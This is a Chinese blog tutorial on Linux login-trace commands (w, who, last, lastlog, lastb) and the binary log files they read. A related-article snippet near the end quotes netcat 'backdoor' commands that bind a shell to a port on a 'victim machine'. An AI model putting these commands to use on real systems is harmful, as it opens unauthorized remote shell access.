Linux 系统痕迹命令

最新推荐文章于 2023-10-10 11:52:24 发布
最新推荐文章于 2023-10-10 11:52:24 发布
阅读量280 收藏 1
点赞数 1
分类专栏: # Linux基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_41388533/article/details/107690554
版权

目录

系统痕迹命令

w 命令

who 命令

​last 命令

lastlog 命令

lastb 命令

系统痕迹命令

  • 系统中有一些重要的痕迹日志文件,如 /var/log/wtmp 、 /var/run/utmp 、 /var/log/btmp 、/var/log/lastlog 等日志文件,如果你用 vim 打开这些文件,你会发现这些文件是二进制乱码。
    • 这是由于这些日志中保存的是系统的重要登录痕迹,包括某个用户何时登录了系统,何时退出了系统,错误登录等重要的系统信息。
    • 这些信息要是可以通过 vim 打开,就能编辑,这样痕迹信息就不准确,所以这些重要的痕迹日志,只能通过对应的命令来进行查看。

w 命令

  • w 命令是显示系统中正在登陆的用户信息的命令,这个命令查看的痕迹日志是/var/run/utmp。这个命令的基本信息如下:
    • 命令名称:w
    • 英文原意:Show who is logged on and what they are doing.
    • 所在路径:/usr/bin/w
    • 执行权限:所有用户。
    • 功能描述:显示登录用户,和他正在做什么。
  • 例如:

  • 第一行信息,内容如下:
内 容说 明
12:26:46系统当前时间
up 1 day, 13:32系统的运行时间,本机已经运行 1 天 13 小时 32 分钟
2 users当前登录了两个用户
load average: 0.00, 0.00, 0.00系统在之前 1 分钟、5 分钟、15 分钟的平均负载。如果 CPU 是单核的,则这个数值超过 1 就是高负载;如果 CPU 是四核的,则这个数值超过 4 就是高负载(这个平均负载完全是依据个人经验来进行判断的,一般认为不应该超过服务器 CPU的核数)
  • 第二行信息,内容如下:
内 容说 明
USER当前登陆的用户
TTY

登陆的终端:

tty1-6:本地字符终端(alt+F1-6 切换)
tty7:本地图形终端(ctrl+alt+F7 切换,必须安装启动图形界面)
pts/0-255:远程终端

FROM登陆的 IP 地址,如果是本地终端,则是空
LOGIN@登陆时间
IDLE用户闲置时间
JCPU所有的进程占用的 CPU 时间
PCPU当前进程占用的 CPU 时间
WHAT用户正在进行的操作

who 命令

  • who 命令和 w 命令类似,用于查看正在登陆的用户,但是显示的内容更加简单,也是查看/var/run/utmp 日志。


last 命令

  • last 命令是查看系统所有登陆过的用户信息的,包括正在登陆的用户和之前登陆的用户。这个命令查看的是/var/log/wtmp 痕迹日志文件。

lastlog 命令

  • lastlog 命令是查看系统中所有用户最后一次的登陆时间的命令,他查看的日志是/var/log/lastlog文件。

lastb 命令

  • lastb 命令是查看错误登陆的信息的,查看的是/var/log/btmp 痕迹日志:

【注】:参考尚硅谷沈超老师教程

NGC_2070
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux中 shell 历史命令记录功能
01-10
Linux 下面可以使用 history 命令查看用户的所有历史操作,同时 shell 命令操作记录默认保存在用户目录的 .bash_history 文件中。通过这个文件可以查询 shell 命令的执行历史,有助于运维人员进行系统审计和问题...
linux中的w命令,Linux中的w命令介绍
weixin_42565402的博客
05-10 1750
Linux中的w命令介绍本教程中,我们将讲解linux系统中的w命令。很多人可能都不知道linux系统中的w命令,今天我们就对w命令做一个详细的讲解。w命令是一个在linux系统中用来显示当前登录用户及这些用户正在做什么的命令。它同时也能显示系统运行时长,当前系统时间和系统平均负载情况。如何使用w命令w的命令语法格式如下:w [OPTIONS] [USER]在终端中不带任何参数直接执行w命令命令...
图解Linux命令之--w命令
热门推荐
杰瑞的专栏
08-01 1万+
w命令-->用来查看登录者的信息及他们的行为
w(1) command
Dablelv 的博客专栏。
10-27 1648
w 显示谁已登录以及他们正在做什么。w 命令用于显示已经登陆系统的用户列表,并显示用户正在执行的指令。执行这个命令可得知目前登入系统的用户有哪些人,以及他们正在执行的程序。单独执行 w 命令会显示所有的用户,您也可指定用户名称,仅显示某位用户的相关信息。
w命令详解
最新发布
Free雅轩的博客
10-10 178
u:当显示当前进程和cpu时间时忽略用户名;-f:显示用户从哪登录;-s:使用短输出格式;-h:不打印头信息;用户:仅显示指定用户。-V:显示版本信息。
w 命令的解释与示例
Free雅轩的博客
02-20 887
​​w​​ 命令Linux 中的一个工具,它显示当前登录到系统中的用户及其进程的信息。我希望这篇文章能帮助你了解 ​​w​​​ 命令及其基本原理。​​w​​​ 命令接受一个可选的选项列表,然后是一个可选的用户名。使用 ​​-s​​​ 选项打印一个简短的输出,不包括 ​​JCPU​​​、​​PCPU​​​ 和 ​​LOGIN@​​ 信息。要停止显示标题,使用 ​​-h​​​ 选项。​​-f​​​ 选项可以在输出中切换 ​​FROM​​ 字段的可见性。下面是一些使用 ​​w​​ 命令的例子。
Linux的script命令——隐藏在终端的记录器
07-30
当你在终端或控制台上工作时,你可能想记录下自己做了些什么。...假设你跟一些Linux管理员同时在系统上干活。或者说你让别人远程到你的服务器。你就会想记录下终端发生过什么。要实现它,你可以使用script命令
Linux_操作系统日志管理全攻略
04-17
日志对于安全来说,非常重要,他记录了系统每天发生的各种各样的事情,你可以通过他来检查错误发生的原因,或者受到攻击时攻击者留下的痕迹。日志主要的功能有:审计和监测。他还可以实时的监测系统状态,监测和追踪...
Linux服务器巡检指导手册.doc
06-07
Linux服务器巡检指导 "设备 " " "硬件配置信息 " "机型号 " " "CPU " " "内存 " " "硬盘 " " "系统信息 " "操作系统 " " "IP " " "主机名 " " (一)服务器硬件检查 "检查项 "检查操作 "参考标准 "巡检情况 " " " " ...
netcat 瑞士军刀 linux windows netcat 瑞士军刀 linux windows
04-15
 这样扫描会留下大量的痕迹系统管理员会额外小心  3.3. 后门  victim machine: //受害者的机器  nc -l -p port -e cmd.exe //win2000  nc -l -p port -e /bin/sh //unix,linux  attacker machine: //...
linux w是什么命令,在Linux系统中使用w命令及w命令选项实例
weixin_31833307的博客
05-02 582
在本文中,我们将介绍Linux操作系统中的w命令,包括w命令选项实例。w是一个命令行实用程序,它显示有关当前登录用户以及每个用户正在做什么的信息,它还提供有关系统已运行多长时间,当前时间以及系统平均负载的信息。使用w命令的方法w命令的语法如下:w [OPTIONS] [USER]在不带任何选项或参数的情况下调用w时,输出如下所示:第一行提供与uptime命令相同的信息,它包含以下列:1、21:41...
Linux——常用命令(痕迹命令)
如不來的博客
06-06 152
Linux系统中有一些重要的痕迹日志文件,如/var/log/wtmp、/var/run/utmp、/var/log/btmp、/var/log/lastlog等日志文件,如果使用vim打开这些文件,会发现都是二进制乱码,这是由于这些日志中保存的是系统的重要登录痕迹等,包括某个用户何时登录了系统、何时退出了系统、错误登录等重要的信息,如果可以通过vim打开编辑,信息就会不准确,所以只能通过对应的...
Linux介绍---系统痕迹命令
菜鸟在进步
04-19 376
系统中有一些重要的痕迹日志文件,如/var/log/wtmp,/var/run/utmp /var/log/btmp /var/log/lastlog等日志文件,如果你使用vim打开这一些文件,你会发现这一些文件是二进制乱码,这是由于这一些日志文件的系统是重要登陆痕迹,包括某个用户何时登陆了系统,何时退出了系统,错误登陆等重要的系统信息。这些信息是可以通过vim打开,就能编辑的,这样痕迹信息就不...
Linux 系统:w命令介绍
小小关的博客
06-27 1680
w命令用于显示已经登陆系统的用户列表,并显示用户正在执行的指令。执行这个命令可得知目前登入系统的用户有那些人,以及他们正在执行的程序。单独执行w命令会显示所有的用户,您也可指定用户名称,仅显示某位用户的相关信息。语法: 选项:......
记录一些w常用的命令(Windows cmd, linux, adb)
qq_25260079的博客
03-19 219
常用的bat命令背景windows普通bat命令字符串查找字符串截取其他简单命令附上我这次的卸载脚本,有删除自身文件夹,删除注册表,删除服务,卸载dll等ADB命令Linux命令 背景 最近这段时间工作中用了一些之前接触很少的Windows命令,所以写一个博客记录一下,有windows的纯bat命令,另外附加一点adb命令。 windows普通bat命令 字符串查找 这个地方是直接借用一个网友的一...
linux查看日志及拷贝,Linux last和lastlog命令:查看过去登陆的用户信息
weixin_35719581的博客
05-05 992
前面,我们已经学了使用 w 或 who 命令查看当前登陆系统的用户信息,但如果原先登录的用户现在已经退出登录,那么是否还能查看呢?当然可以,这就需要使用 last 和 lastlog 命令。last 命令可以查看当前和过去登陆系统用户的相关信息;lastlog 命令可以查看到每个系统用户最近一次登陆系统的时间。我们先来看看last 命令,此命令的基本格式如下所示:[root@localhost ~...
linux 目前登入系统的用户有那些人
javabaidu的专栏
10-09 251
语法:w [-fhlsuV][用户名称] linux w 命令补充说明:执行这项指令可得知目前登入系统的用户有那些人,以及他们正在执行的程序。单独执行linux w 命令会显示所有的用户,您也可指定用户名称,仅显示某位用户的相关信息。 linux w 命令参数: -f  开启或关闭显示用户从何处登入系统。 -h  不显示各栏位的标题信息列。 -l  使用详细格式列表,...
Linux命令详解之w命令
说文科技,做有态度的研究。
10-29 7489
Linux命令详解之w命令 1.命令详解 ··· NAME w - Show who is logged on and what they are doing. w命令就是用来展示谁在登录,以及他们在做什么。 DESCRIPTION w displays information about the users currently on the machine...
w 命令解释
yehenhei的专栏
10-10 421
USER —登录的用户名 TTY —登录后系统分配的终端号 FROM—远程主机名,即从哪儿登录来的 LOGIN@—何时登录 IDLE—空闲了多长时间,表示用户闲置的时间(指该用户在此机上多久没敲入命令)。这是一个计时器,一旦用户执行任何操作,该计 时器便会被重置 JCPU—和该终端(tty)连接的所有进程占用的时间,这个时间里并不包括过去的后台作业时间,但却包括当前正在运行的后台作业所占
Linux系统scp命令
09-13
Linux系统中的scp命令是一种安全的远程文件拷贝命令,它使用基于ssh的登录来进行文件的传输。与其他类似命令如cp不同的是,scp可以在Linux服务器之间复制文件和目录。scp的传输是加密的,因此可以确保数据的安全性。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值